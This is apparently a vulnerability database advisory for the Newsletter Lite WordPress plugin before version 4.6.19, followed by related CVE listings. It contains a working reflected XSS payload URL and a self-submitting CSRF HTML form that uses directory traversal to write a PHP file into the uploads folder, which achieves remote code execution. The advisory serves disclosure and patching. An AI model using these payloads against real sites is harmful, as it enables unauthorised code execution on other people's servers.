Lucene search
WpvulndbWPEX-ID:C1147745-9E0E-454D-8F7C-179D818B3596HistoryJul 01, 2019 - 12:00 a.m.
Newsletter Lite < 4.6.19 - Multiple Issues
2019-07-0100:00:00
wpvulndb
13
0.003 Low
EPSS
Percentile
66.3%
- Lack of CSRF, Authorisation and sanitisation checks in the ajax_load_new_editor() function, registered as an AJAX method, can lead to an authenticated reflected XSS issue. - Authenticated Directory Traversal leading to RCE
XSS: As an authenticated user (with a role as low as a Subscriber), open https://<BLOG>/wp-admin/admin-ajax.php?action=newsletters_load_new_editor&contentarea="><svg/onload=alert(/XSS/)>
RCE: Save the below code in an HTML file, then open it when logged in (with a role as low as Subscriber).
<html>
<body onload="document.forms[0].submit()";>
<form action="https://<BLOG>/wp-admin/admin-ajax.php?action=newsletters_exportmultiple&exportfile=../../nl_rce.php" method="POST">
<input type="hidden" name="headings[0][0]" value=""/>
<input type="hidden" name="subscribers[0][0]" value="<?php echo('Authenticated RCE'); ?>"/>
</form>
</body>
</html>
Then, the PHP file will be at https://<BLOG>/wp-content/uploads/nl_rce.phpRelated
wpvulndb
wpvulndb
Newsletter Lite < 4.6.19 - Multiple Issues
2019-07-01 00:00:00
prion
prion
Directory traversal
2019-08-15 16:15:00
Design/Logic Flaw
2019-08-09 13:15:00
nvd
nvd
CVE-2019-14788
2019-08-15 16:15:12
CVE-2019-14787
2019-08-09 13:15:12
cvelist
cvelist
CVE-2019-14787
2019-08-09 12:21:59
CVE-2019-14788
2019-08-15 15:45:22
cve
cve
CVE-2019-14788
2019-08-15 16:15:12
CVE-2019-14787
2019-08-09 13:15:12